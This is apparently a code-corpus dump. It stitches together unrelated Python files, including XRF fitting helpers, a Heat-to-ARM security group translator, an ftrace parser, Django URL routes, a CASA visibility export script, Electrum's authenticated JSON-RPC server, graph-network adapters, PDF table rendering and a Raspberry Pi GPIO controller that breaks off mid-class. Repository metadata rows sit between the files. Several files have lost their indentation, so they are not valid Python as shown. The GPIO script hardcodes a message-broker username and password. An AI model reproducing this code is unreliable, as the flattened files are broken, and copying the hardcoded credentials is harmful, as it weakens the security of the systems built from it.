.. warning :: This function mutates the input values.
    Parameters
----------
param : dict
all parameters including element
name_list : list
strategy names
"""
for n in name_list:
for k, v in six.iteritems(param):
if k == 'non_fitting_values':
continue
if n not in v:
v.update({n: v['bound_type']})
def get_Z(ename):
"""
Return element's Z number.
Parameters
----------
ename : str
element name
Returns
-------
int or None
element Z number
"""
strip_line = lambda ename: ename.split('_')[0]
non_element = ['compton', 'elastic', 'background']
if ename in non_element:
return '-'
else:
e = Element(strip_line(ename))
return str(e.Z)
def get_energy(ename):
strip_line = lambda ename: ename.split('_')[0]
non_element = ['compton', 'elastic', 'background']
if ename in non_element:
return '-'
else:
e = Element(strip_line(ename))
if '_K' in ename:
energy = e.emission_line['ka1']
elif '_L' in ename:
energy = e.emission_line['la1']
elif '_M' in ename:
energy = e.emission_line['ma1']
return str(np.around(energy, 4))
def get_element(param):
element_list = param['non_fitting_values']['element_list']
return [e.strip(' ') for e in element_list.split(',')]
def factor_height2area(energy, param, std_correction=1):
"""
Factor to transfer peak height to area.
"""
temp_val = 2 * np.sqrt(2 * np.log(2))
epsilon = param['non_fitting_values']['electron_hole_energy']
sigma = np.sqrt((param['fwhm_offset']['value'] / temp_val)**2
+ energy * epsilon * param['fwhm_fanoprime']['value'])
return sigma*std_correction
def param_dict_cleaner(param, element_list):
"""
Make sure param only contains element from element_list.
Parameters
----------
param : dict
fitting parameters
element_list : list
list of elemental lines
Returns
-------
dict :
new param dict containing given elements
"""
param_new = {}
for k, v in six.iteritems(param):
if k == 'non_fitting_values' or k == k.lower():
param_new.update({k: v})
else:
if k[:2] in element_list:
param_new.update({k: v})
return param_new | bsd-3-clause | -2,165,580,146,740,394,200 | 36.340541 | 118 | 0.551446 | false | 3.962002 | false | false | false |
aznashwan/heat2arm | heat2arm/translators/networking/secgroups/ec2_secgroup.py | 1 | 3254 | # Copyright 2015 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Contains the definition for the EC2 security group translator.
"""
from heat2arm.translators.networking.secgroups.base_secgroup import (
BaseSecurityGroupARMTranslator
)
class EC2SecurityGroupARMTranslator(BaseSecurityGroupARMTranslator):
""" EC2SecurityGroupARMTranslator is the translator
for EC2 security groups.
"""
heat_resource_type = "AWS::EC2::SecurityGroup"
def _get_rules(self):
""" _get_rules is a helper method which returns a list of all
the resulting ARM security group rules to be created.
"""
i = 0
rules = []
# traverse all ingress rules; if any:
if "SecurityGroupIngress" in self._heat_resource.properties.data:
for in_rule in self._heat_resource.properties.data[
"SecurityGroupIngress"]:
# build the rule:
rule = {
"name": "%s_rule_%d" % (self._name, i),
"properties": {
"protocol": in_rule["IpProtocol"],
"sourcePortRange": in_rule["FromPort"],
"destinationPortRange": in_rule["ToPort"],
"sourceAddressPrefix": in_rule["CidrIp"],
"destinationAddressPrefix": "*",
"direction": "Inbound",
"access": "Allow",
# NOTE: priority is always fixed.
"priority": 100 + i,
}
}
i = i + 1
rules.append(rule)
# traverse all egress rules; if any:
if "SecurityGroupEgress" in self._heat_resource.properties.data:
for out_rule in self._heat_resource.properties.data[
"SecurityGroupEgress"]:
# build the rule:
rule = {
"name": "%s_rule_%d" % (self._name, i),
"properties": {
"protocol": out_rule["IpProtocol"],
"sourcePortRange": out_rule["FromPort"],
"destinationPortRange": out_rule["ToPort"],
"sourceAddressPrefix": out_rule["CidrIp"],
"destinationAddressPrefix": "*",
"direction": "Outbound",
"access": "Allow",
# NOTE: priority is always fixed.
"priority": 100 + i,
}
}
i = i + 1
rules.append(rule)
return rules
| apache-2.0 | -445,866,815,154,035,600 | 37.738095 | 78 | 0.527966 | false | 4.750365 | false | false | false |
corakwue/ftrace | ftrace/parsers/sched_load_avg_cpu.py | 1 | 2005 | #!/usr/bin/python
# Copyright 2015 Huawei Devices USA Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Authors:
# Chuk Orakwue <[email protected]>
import re
from ftrace.common import ParserError
from .register import register_parser
try:
from ftrace.third_party.cnamedtuple import namedtuple
except ImportError:
from collections import namedtuple
TRACEPOINT = 'sched_load_avg_cpu'
__all__ = [TRACEPOINT]
SchedLoadAvgCpuBase = namedtuple(TRACEPOINT,
[
        'cpu',
'load_avg',
'util_avg'
]
)
class SchedLoadAvgCpu(SchedLoadAvgCpuBase):
__slots__ = ()
def __new__(cls, cpu, load_avg, util_avg):
cpu = int(cpu)
load_avg = int(load_avg)
util_avg = int(util_avg)
return super(cls, SchedLoadAvgCpu).__new__(
cls,
cpu=cpu,
load_avg=load_avg,
util_avg=util_avg,
)
sched_load_avg_cpu_pattern = re.compile(
r"""
cpu=(?P<cpu>\d+)\s+
load_avg=(?P<load_avg>\d+)\s+
util_avg=(?P<util_avg>\d+)
""",
re.X|re.M
)
@register_parser
def sched_load_avg_cpu(payload):
"""Parser for `sched_load_avg_cpu` tracepoint"""
try:
match = re.match(sched_load_avg_cpu_pattern, payload)
if match:
match_group_dict = match.groupdict()
return SchedLoadAvgCpu(**match_group_dict)
    except Exception as e:
raise ParserError(e.message)
| apache-2.0 | 1,968,760,944,318,342,700 | 26.094595 | 74 | 0.632918 | false | 3.523726 | false | false | false |
grepme/cmput410-project | api/urls.py | 1 | 1779 | from django.conf.urls import patterns, include, url
guid_regex = "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
sha1_regex = "[a-zA-Z0-9]+"
id_regex = "(({guid})|({sha1}))".format(guid=guid_regex,sha1=sha1_regex)
urlpatterns = patterns('api.views',
# get posts by a specific author that the current authenticated user
# can view
# author/id1/posts
# /api/author/ef3e0e05-c5f8-11e4-a972-b8f6b116b2b7/posts/
(r'^author/(?:(?P<author_id>{})/?)?posts/?(?:/(?P<page>\d*)/?)?$'.format(id_regex), 'get_posts'),
# Get a specific post or all public posts
(r'^posts/?(?:(?P<post_id>{}))?/?$'.format(id_regex), 'get_post'),
#See if a author_id is a friend with author_2_id
(r'^friends/(?P<author_id>{0})/(?P<author_2_id>{0})/?$'.format(id_regex), 'is_friend'),
# POST authors, returns list of friends in the list
(r'^friends/(?P<author_id>{})/?$'.format(id_regex), 'get_friends'),
# GET authors on our server
(r'^author$', 'get_authors'),
# GET author on our server
(r'^author/(?P<profile_id>{})/?$'.format(id_regex), 'get_author'),
# Make a friend request with another user
(r'^friendrequest$', 'friend_request'),
# Follow a specific user
(r'^follow$', 'follow_user'),
# search for a user
#(r'search/(?P<name>([a-zA-Z0-9 -._~:?#%]+))/?$', 'search_users'),
)
| apache-2.0 | -7,852,624,737,404,225,000 | 44.615385 | 121 | 0.45756 | false | 3.414587 | false | false | false |
jspilker/visilens | examples/Ex1_get_data_continuum.py | 1 | 4773 | """
Example 1, to be run within CASA. This script serves as a guideline
for how to get data out of a CASA ms and into a format which
visilens can use. We really don't need all that much information,
so we keep only the columns we need.
To keep the number of visibilities low, we first average the data
a bit. In this particular case, the on-source integration times were
only ~60s, so we won't average in time. We will average down each of
the four ALMA basebands (spectral windows), since this is continuum
data and the fractional bandwidth from the lowest to highest observed
frequency is small. We'll also average the two orthogonal polarizations,
since the source is unpolarized. Last, for fitting, we need an
accurate estimate of the uncertainty on each visibility. The *relative*
uncertainties in the data are okay, but they're not on any absolute scale,
so we need to calculate what the re-scaling factor should be. To do this,
we take the difference between successive visibilities on each baseline
(these are strong sources, so unfortunately we can't just use the rms)
and re-scale the noise to match. In principle CASA's statwt also does
this, but I found that it sometimes gave bizarre results (some baselines
weighted 100x more than others for no obvious reason, etc.). If you
have better luck with it, feel free to use that instead!
"""
import numpy as np
import os
c = 299792458.0 # in m/s
# Path to the calibrated ms file, and the source name we want.
inms = 'Compact_0202_to_0418.cal.ms'
field = 'SPT0202-61'
spw = '0,1,2,3'
# First we split out just the source we want from our ms file.
outms = field+'_'+inms[:3].lower()+'.ms'
os.system('rm -rf '+outms)
split(inms,outms,field=field,spw=spw,width=128,datacolumn='corrected',
keepflags=False)
# Now we'll get the visibility columns we need, before manipulating them.
# data_desc_id is a proxy for the spw number.
ms.open(outms,nomodify=True)
visdata = ms.getdata(['uvw','antenna1','antenna2','data','sigma','data_desc_id'])
visdata['data'] = np.squeeze(visdata['data']) # ditch unnecessary extra dimension
ms.close()
# Get the frequencies associated with each spw, because uvw coordinates are in m
tb.open(outms+'/SPECTRAL_WINDOW')
freqs = np.squeeze(tb.getcol('CHAN_FREQ')) # center freq of each spw
tb.close()
# Get the primary beam size from the antenna diameter. Assumes homogeneous array,
# sorry CARMA users.
tb.open(outms+'/ANTENNA')
diam = np.squeeze(tb.getcol('DISH_DIAMETER'))[0]
PBfwhm = 1.2*(c/np.mean(freqs))/diam * (3600*180/np.pi) # in arcsec
tb.close()
# Data and sigma have both polarizations; average them
visdata['data'] = np.average(visdata['data'],weights=(visdata['sigma']**-2.),axis=0)
visdata['sigma']= np.sum((visdata['sigma']**-2.),axis=0)**-0.5
# Convert uvw coords from m to lambda
for ispw in range(len(spw.split(','))):
visdata['uvw'][:,visdata['data_desc_id']==ispw] *= freqs[ispw]/c
# Calculate the noise re-scaling, by differencing consecutive visibilities on the
# same baseline. Have to do an ugly double-loop here; would work better if we knew
# in advance how the data were ordered (eg time-sorted). We assume that we can
# re-scale the noise using the mean of the re-scalings from each baseline.
facs = []
for ant1 in np.unique(visdata['antenna1']):
for ant2 in np.unique(visdata['antenna2']):
if ant1 < ant2:
thisbase = (visdata['antenna1']==ant1) & (visdata['antenna2']==ant2)
reals = visdata['data'].real[thisbase]
imags = visdata['data'].imag[thisbase]
sigs = visdata['sigma'][thisbase]
diffrs = reals - np.roll(reals,-1); diffis = imags - np.roll(imags,-1)
std = np.mean([diffrs.std(),diffis.std()])
facs.append(std/sigs.mean()/np.sqrt(2))
facs = np.asarray(facs); visdata['sigma'] *= facs.mean()
print outms, '| mean rescaling factor: ',facs.mean(), '| rms/beam (mJy): ',1000*((visdata['sigma']**-2).sum())**-0.5
# If we ever want to mess with the data after re-scaling the weights, we have to
# write them back to the ms file. But, CASA doesn't like that we've averaged
# the polarizations together, so we have to keep them separate for this purpose.
ms.open(outms,nomodify=False)
replace = ms.getdata(['sigma','weight'])
replace['sigma'] *= facs.mean()
replace['weight'] = replace['sigma']**-2.
ms.putdata(replace)
ms.close()
# Create one single array of all this data, then save everything.
allarr = np.vstack((visdata['uvw'][0,:],visdata['uvw'][1,:],visdata['data'].real,
visdata['data'].imag,visdata['sigma'],visdata['antenna1'],visdata['antenna2']))
outfname = field+'_'+inms[:3].lower()+'.bin'
with open(outfname,'wb')as f:
allarr.tofile(f)
f.write(PBfwhm)
| mit | 5,476,157,098,352,860,000 | 44.457143 | 116 | 0.699979 | false | 3.229364 | false | false | false |
bbondy/brianbondy.gae | libs/sx/pisa3/pisa_tables.py | 1 | 13877 | # -*- coding: ISO-8859-1 -*-
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__reversion__ = "$Revision: 20 $"
__author__ = "$Author: holtwick $"
__date__ = "$Date: 2007-10-09 12:58:24 +0200 (Di, 09 Okt 2007) $"
from pisa_tags import pisaTag
from pisa_util import *
from pisa_reportlab import PmlTable, TableStyle, PmlKeepInFrame
import copy
import sys
import logging
log = logging.getLogger("ho.pisa")
def _width(value=None):
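    # Keep percentage widths as strings; convert any other unit to an absolute size via getSize().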
if value is None:
return None
value = str(value)
if value.endswith("%"):
return value
return getSize(value)
class TableData:
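    """Collects cell data, spans and TableStyle commands while a <table> is being parsed."""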
def __init__(self):
self.data = []
self.styles = []
self.span = []
self.mode = ""
self.padding = 0
self.col = 0
# self.c = None
def add_cell(self, data=None):
self.col += 1
self.data[len(self.data) - 1].append(data)
def add_style(self, data):
# print self.mode, data
# Do we have color and
# width = data[3]
#if data[0].startswith("LINE"):
# color = data[4]
# if color is None:
# return
self.styles.append(copy.copy(data))
def add_empty(self, x, y):
self.span.append((x, y))
def get_data(self):
data = self.data
for x, y in self.span:
try:
data[y].insert(x, '')
except:
pass
return data
def add_cell_styles(self, c, begin, end, mode="td"):
def getColor(a, b):
return a
self.mode = mode.upper()
if c.frag.backColor and mode != "tr": # XXX Stimmt das so?
self.add_style(('BACKGROUND', begin, end, c.frag.backColor))
# print 'BACKGROUND', begin, end, c.frag.backColor
if 0:
log.debug("%r", (
begin,
end,
c.frag.borderTopWidth,
c.frag.borderTopStyle,
c.frag.borderTopColor,
c.frag.borderBottomWidth,
c.frag.borderBottomStyle,
c.frag.borderBottomColor,
c.frag.borderLeftWidth,
c.frag.borderLeftStyle,
c.frag.borderLeftColor,
c.frag.borderRightWidth,
c.frag.borderRightStyle,
c.frag.borderRightColor,
))
if getBorderStyle(c.frag.borderTopStyle) and c.frag.borderTopWidth and c.frag.borderTopColor is not None:
self.add_style(('LINEABOVE', begin, (end[0], begin[1]),
c.frag.borderTopWidth,
c.frag.borderTopColor,
"squared"))
if getBorderStyle(c.frag.borderLeftStyle) and c.frag.borderLeftWidth and c.frag.borderLeftColor is not None:
self.add_style(('LINEBEFORE', begin, (begin[0], end[1]),
c.frag.borderLeftWidth,
c.frag.borderLeftColor,
"squared"))
if getBorderStyle(c.frag.borderRightStyle) and c.frag.borderRightWidth and c.frag.borderRightColor is not None:
self.add_style(('LINEAFTER', (end[0], begin[1]), end,
c.frag.borderRightWidth,
c.frag.borderRightColor,
"squared"))
if getBorderStyle(c.frag.borderBottomStyle) and c.frag.borderBottomWidth and c.frag.borderBottomColor is not None:
self.add_style(('LINEBELOW', (begin[0], end[1]), end,
c.frag.borderBottomWidth,
c.frag.borderBottomColor,
"squared"))
self.add_style(('LEFTPADDING', begin, end, c.frag.paddingLeft or self.padding))
self.add_style(('RIGHTPADDING', begin, end, c.frag.paddingRight or self.padding))
self.add_style(('TOPPADDING', begin, end, c.frag.paddingTop or self.padding))
self.add_style(('BOTTOMPADDING', begin, end, c.frag.paddingBottom or self.padding))
class pisaTagTABLE(pisaTag):
def start(self, c):
c.addPara()
attrs = self.attr
# Swap table data
c.tableData, self.tableData = TableData(), c.tableData
tdata = c.tableData
# border
#tdata.border = attrs.border
#tdata.bordercolor = attrs.bordercolor
begin = (0, 0)
end = (-1, - 1)
if attrs.border and attrs.bordercolor:
frag = c.frag
frag.borderLeftWidth = attrs.border
frag.borderLeftColor = attrs.bordercolor
frag.borderLeftStyle = "solid"
frag.borderRightWidth = attrs.border
frag.borderRightColor = attrs.bordercolor
frag.borderRightStyle = "solid"
frag.borderTopWidth = attrs.border
frag.borderTopColor = attrs.bordercolor
frag.borderTopStyle = "solid"
frag.borderBottomWidth = attrs.border
frag.borderBottomColor = attrs.bordercolor
frag.borderBottomStyle = "solid"
# tdata.add_style(("GRID", begin, end, attrs.border, attrs.bordercolor))
tdata.padding = attrs.cellpadding
#if 0: #attrs.cellpadding:
# tdata.add_style(('LEFTPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('RIGHTPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('TOPPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('BOTTOMPADDING', begin, end, attrs.cellpadding))
# alignment
#~ tdata.add_style(('VALIGN', (0,0), (-1,-1), attrs.valign.upper()))
# Set Border and padding styles
tdata.add_cell_styles(c, (0, 0), (-1, - 1), "table")
# bgcolor
#if attrs.bgcolor is not None:
# tdata.add_style(('BACKGROUND', (0, 0), (-1, -1), attrs.bgcolor))
tdata.align = attrs.align.upper()
tdata.col = 0
tdata.row = 0
tdata.colw = []
tdata.rowh = []
tdata.repeat = attrs.repeat
tdata.width = _width(attrs.width)
# self.tabdata.append(tdata)
def end(self, c):
tdata = c.tableData
data = tdata.get_data()
# Add missing columns so that each row has the same count of columns
# This prevents errors in Reportlab table
try:
maxcols = max([len(row) for row in data] or [0])
except ValueError:
log.warn(c.warning("<table> rows seem to be inconsistent"))
            maxcols = 0
for i, row in enumerate(data):
data[i] += [''] * (maxcols - len(row))
try:
if tdata.data:
# log.debug("Table sryles %r", tdata.styles)
t = PmlTable(
data,
colWidths=tdata.colw,
rowHeights=tdata.rowh,
# totalWidth = tdata.width,
splitByRow=1,
# repeatCols = 1,
repeatRows=tdata.repeat,
hAlign=tdata.align,
vAlign='TOP',
style=TableStyle(tdata.styles))
t.totalWidth = _width(tdata.width)
t.spaceBefore = c.frag.spaceBefore
t.spaceAfter = c.frag.spaceAfter
# XXX Maybe we need to copy some more properties?
t.keepWithNext = c.frag.keepWithNext
# t.hAlign = tdata.align
c.addStory(t)
else:
log.warn(c.warning("<table> is empty"))
except:
log.warn(c.warning("<table>"), exc_info=1)
# Cleanup and re-swap table data
c.clearFrag()
c.tableData, self.tableData = self.tableData, None
class pisaTagTR(pisaTag):
def start(self, c):
tdata = c.tableData
row = tdata.row
begin = (0, row)
end = (-1, row)
tdata.add_cell_styles(c, begin, end, "tr")
c.frag.vAlign = self.attr.valign or c.frag.vAlign
tdata.col = 0
tdata.data.append([])
def end(self, c):
c.tableData.row += 1
class pisaTagTD(pisaTag):
def start(self, c):
if self.attr.align is not None:
#print self.attr.align, getAlign(self.attr.align)
c.frag.alignment = getAlign(self.attr.align)
c.clearFrag()
self.story = c.swapStory()
# print "#", len(c.story)
attrs = self.attr
tdata = c.tableData
cspan = attrs.colspan
rspan = attrs.rowspan
row = tdata.row
col = tdata.col
        while 1:
            for x, y in tdata.span:
                if x == col and y == row:
                    col += 1
                    tdata.col += 1
                    break
            else:
                break
#cs = 0
#rs = 0
begin = (col, row)
end = (col, row)
if cspan:
end = (end[0] + cspan - 1, end[1])
if rspan:
end = (end[0], end[1] + rspan - 1)
if begin != end:
#~ print begin, end
tdata.add_style(('SPAN', begin, end))
for x in range(begin[0], end[0] + 1):
for y in range(begin[1], end[1] + 1):
if x != begin[0] or y != begin[1]:
tdata.add_empty(x, y)
# Set Border and padding styles
tdata.add_cell_styles(c, begin, end, "td")
# Calculate widths
# Add empty placeholders for new columns
if (col + 1) > len(tdata.colw):
tdata.colw = tdata.colw + ((col + 1 - len(tdata.colw)) * [_width()])
# Get value of with, if no spanning
if not cspan:
# print c.frag.width
width = c.frag.width or self.attr.width #self._getStyle(None, attrs, "width", "width", mode)
# If is value, the set it in the right place in the arry
# print width, _width(width)
if width is not None:
tdata.colw[col] = _width(width)
# Calculate heights
if row + 1 > len(tdata.rowh):
tdata.rowh = tdata.rowh + ((row + 1 - len(tdata.rowh)) * [_width()])
if not rspan:
height = None #self._getStyle(None, attrs, "height", "height", mode)
if height is not None:
tdata.rowh[row] = _width(height)
tdata.add_style(('FONTSIZE', begin, end, 1.0))
tdata.add_style(('LEADING', begin, end, 1.0))
# Vertical align
valign = self.attr.valign or c.frag.vAlign
if valign is not None:
tdata.add_style(('VALIGN', begin, end, valign.upper()))
# Reset border, otherwise the paragraph block will have borders too
frag = c.frag
frag.borderLeftWidth = 0
frag.borderLeftColor = None
frag.borderLeftStyle = None
frag.borderRightWidth = 0
frag.borderRightColor = None
frag.borderRightStyle = None
frag.borderTopWidth = 0
frag.borderTopColor = None
frag.borderTopStyle = None
frag.borderBottomWidth = 0
frag.borderBottomColor = None
frag.borderBottomStyle = None
def end(self, c):
tdata = c.tableData
c.addPara()
cell = c.story
# Handle empty cells, they otherwise collapse
#if not cell:
# cell = ' '
# Keep in frame if needed since Reportlab does no split inside of cells
if (not c.frag.insideStaticFrame) and (c.frag.keepInFrameMode is not None):
# tdata.keepinframe["content"] = cell
cell = PmlKeepInFrame(
maxWidth=0,
maxHeight=0,
mode=c.frag.keepInFrameMode,
content=cell)
c.swapStory(self.story)
tdata.add_cell(cell)
class pisaTagTH(pisaTagTD):
pass
'''
end_th = end_td
def start_keeptogether(self, attrs):
self.story.append([])
self.next_para()
def end_keeptogether(self):
if not self.story[-1]:
self.add_noop()
self.next_para()
s = self.story.pop()
self.add_story(KeepTogether(s))
def start_keepinframe(self, attrs):
self.story.append([])
self.keepinframe = {
"maxWidth": attrs["maxwidth"],
"maxHeight": attrs["maxheight"],
"mode": attrs["mode"],
"name": attrs["name"],
"mergeSpace": attrs["mergespace"]
}
# print self.keepinframe
self.next_para()
def end_keepinframe(self):
if not self.story[-1]:
self.add_noop()
self.next_para()
self.keepinframe["content"] = self.story.pop()
self.add_story(KeepInFrame(**self.keepinframe))
''' | mit | 3,694,893,880,446,124,500 | 32.439206 | 122 | 0.517475 | false | 3.857937 | false | false | false |
timevortexproject/timevortex | weather/utils/globals.py | 1 | 1404 | #!/usr/bin/python3
# -*- coding: utf8 -*-
# -*- Mode: Python; py-indent-offset: 4 -*-
"""Globals for weather app"""
from datetime import datetime, timedelta
from django.conf import settings
KEY_METEAR_NO_SITE_ID = "metear_no_site_id"
KEY_METEAR_BAD_URL = "metear_bad_url"
KEY_METEAR_PROBLEM_WS = "metear_problem_ws"
KEY_METEAR_BAD_CONTENT = "metear_bad_content"
KEY_METEAR_NO_START_DATE = "metear_no_start_date"
PROCESS_STOPPED = "Process stopped. Wait a minute before retrying."
ERROR_METEAR = {
KEY_METEAR_NO_SITE_ID: "No METEAR Site in database. %s" % PROCESS_STOPPED,
KEY_METEAR_BAD_URL: "Bad URL to target METEAR service. %s" % PROCESS_STOPPED,
KEY_METEAR_PROBLEM_WS: "METEAR Web service does not respond. %s" % PROCESS_STOPPED,
KEY_METEAR_BAD_CONTENT: "Bad content from METEAR Web service. %s" % PROCESS_STOPPED,
KEY_METEAR_NO_START_DATE: "No start date found in DB. %s" % PROCESS_STOPPED,
}
SETTINGS_METEAR_URL = "METEAR_URL"
SETTINGS_DEFAULT_METEAR_URL = "http://www.wunderground.com/history/airport/%s/%s/DailyHistory.html?format=1"
SETTINGS_STUBS_METEAR_URL = "%s%s" % (settings.SITE_URL, "/stubs/history/airport/%s/%s/DailyHistory.html?format=1")
SETTINGS_STUBS_NEW_METEAR_URL = "%s%s" % (
settings.SITE_URL, "/stubs/history/airport/%s/%s/NewDailyHistory.html?format=1")
SETTINGS_STUBS_METEAR_START_DATE = (datetime.today() - timedelta(days=3)).strftime("%Y/%m/%d")
| mit | -9,200,364,049,418,442,000 | 49.142857 | 115 | 0.712251 | false | 2.664137 | false | false | false |
cryptapus/electrum-myr | lib/jsonrpc.py | 1 | 3726 | #!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer, SimpleJSONRPCRequestHandler
from base64 import b64decode
import time
from . import util
class RPCAuthCredentialsInvalid(Exception):
def __str__(self):
return 'Authentication failed (bad credentials)'
class RPCAuthCredentialsMissing(Exception):
def __str__(self):
return 'Authentication failed (missing credentials)'
class RPCAuthUnsupportedType(Exception):
def __str__(self):
return 'Authentication failed (only basic auth is supported)'
# based on http://acooke.org/cute/BasicHTTPA0.html by andrew cooke
class VerifyingJSONRPCServer(SimpleJSONRPCServer):
def __init__(self, rpc_user, rpc_password, *args, **kargs):
self.rpc_user = rpc_user
self.rpc_password = rpc_password
class VerifyingRequestHandler(SimpleJSONRPCRequestHandler):
def parse_request(myself):
# first, call the original implementation which returns
# True if all OK so far
if SimpleJSONRPCRequestHandler.parse_request(myself):
try:
self.authenticate(myself.headers)
return True
except (RPCAuthCredentialsInvalid, RPCAuthCredentialsMissing,
RPCAuthUnsupportedType) as e:
myself.send_error(401, str(e))
except BaseException as e:
import traceback, sys
traceback.print_exc(file=sys.stderr)
myself.send_error(500, str(e))
return False
SimpleJSONRPCServer.__init__(
self, requestHandler=VerifyingRequestHandler, *args, **kargs)
def authenticate(self, headers):
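        """Check HTTP Basic auth credentials against the configured RPC user and password."""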
if self.rpc_password == '':
# RPC authentication is disabled
return
auth_string = headers.get('Authorization', None)
if auth_string is None:
raise RPCAuthCredentialsMissing()
(basic, _, encoded) = auth_string.partition(' ')
if basic != 'Basic':
raise RPCAuthUnsupportedType()
encoded = util.to_bytes(encoded, 'utf8')
credentials = util.to_string(b64decode(encoded), 'utf8')
(username, _, password) = credentials.partition(':')
if not (util.constant_time_compare(username, self.rpc_user)
and util.constant_time_compare(password, self.rpc_password)):
time.sleep(0.050)
raise RPCAuthCredentialsInvalid()
| mit | 1,195,370,511,997,288,000 | 38.221053 | 91 | 0.665056 | false | 4.555012 | false | false | false |
google-research/google-research | ipagnn/adapters/gat_adapters.py | 1 | 2892 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adapters for GAT models."""
import jax
import jax.numpy as jnp
from ipagnn.adapters import common_adapters
class GATAdapter(common_adapters.SequenceAdapter):
"""Adapter for GAT model."""
def as_example(self, dataset_item):
inputs = jax.tree_map(lambda x: x.numpy(), dataset_item)
example = {
'start_index': inputs['cfg']['start_index'],
'exit_index': inputs['cfg']['exit_index'],
'data': inputs['cfg']['data'],
'edge_types': inputs['cfg']['edge_types'],
'source_indices': inputs['cfg']['adjacency_list/source_indices'],
'dest_indices': inputs['cfg']['adjacency_list/dest_indices'],
'steps': inputs['cfg']['steps'],
'target_output': inputs['target_output'],
'target_output_length': inputs['target_output_length'],
'human_readable_target_output': inputs['human_readable_target_output'],
'human_readable_code': inputs['human_readable_code'],
}
if 'error_type' in inputs:
example['error_type'] = inputs['error_type']
return example
def get_train_inputs(self, example):
return {key: value for key, value in example.items()
if value.dtype != jnp.dtype('O')}
class GGNNAdapter(common_adapters.SequenceAdapter):
"""Adapter for GGNN model."""
def as_example(self, dataset_item):
inputs = jax.tree_map(lambda x: x.numpy(), dataset_item)
example = {
'start_index': inputs['cfg']['start_index'],
'exit_index': inputs['cfg']['exit_index'],
'data': inputs['cfg']['data'],
'edge_types': inputs['cfg']['edge_types'],
'source_indices': inputs['cfg']['adjacency_list/source_indices'],
'dest_indices': inputs['cfg']['adjacency_list/dest_indices'],
'steps': inputs['cfg']['steps'],
'target_output': inputs['target_output'],
'target_output_length': inputs['target_output_length'],
'human_readable_target_output': inputs['human_readable_target_output'],
'human_readable_code': inputs['human_readable_code'],
}
if 'error_type' in inputs:
example['error_type'] = inputs['error_type']
return example
def get_train_inputs(self, example):
return {key: value for key, value in example.items()
if value.dtype != jnp.dtype('O')}
| apache-2.0 | 6,610,926,958,701,834,000 | 37.56 | 79 | 0.651107 | false | 3.770535 | false | false | false |
sakthivigneshr/homeauto | src/control/rpi/rpi_gpio_slave.py | 1 | 1752 | import pika
import RPi.GPIO as GPIO
import paho.mqtt.client as mqtt
from threading import Thread
USER = "test"
PASS = "test123"
VHOST = "/cloudlynk"
HOST = "mohawk.link"
KEY = "solfeta"
XCHANGE = "home"
OUTPUT_PIN = 7
def callback(ch, method, properties, body):
level = int(body)
print("received msg: " + repr(level))
GPIO.output(OUTPUT_PIN, level)
def on_message(mqttc, app_data, msg):
level = int(msg.payload)
print "Received message " + repr(level)
GPIO.output(OUTPUT_PIN, level)
def on_connect(mqttc, app_data, flags, rc):
print "Connect successful"
mqttc.subscribe("control/lights/00")
class rabbitConnect(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
print "Starting RabbitMQ"
cred = pika.PlainCredentials(USER, PASS)
conn = pika.BlockingConnection(pika.ConnectionParameters(
host=HOST, virtual_host=VHOST, credentials=cred))
chan = conn.channel()
chan.exchange_declare(exchange=XCHANGE, type='topic')
rslt = chan.queue_declare(exclusive=True)
q = rslt.method.queue
chan.queue_bind(exchange=XCHANGE, queue=q, routing_key=KEY)
